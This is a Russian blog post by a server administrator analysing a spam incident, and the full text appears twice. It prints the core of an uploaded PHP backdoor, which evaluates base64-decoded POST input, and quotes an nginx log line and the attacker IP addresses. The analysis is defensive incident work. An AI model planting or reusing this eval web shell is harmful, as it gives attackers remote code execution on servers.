cb6f82f3e4007bdaccf419abafab94c8
Очередной раз наспамили с одного из моих серверов.
Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.
Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:
2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"
Имя файла показалось подозрительным, дальше все раскрутилось легко.
Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)
Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера
Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.
(
Comments |Comment on this)
Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.
Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:
2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"
Имя файла показалось подозрительным, дальше все раскрутилось легко.
Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)
Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера
Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.
(
Comments |Comment on this)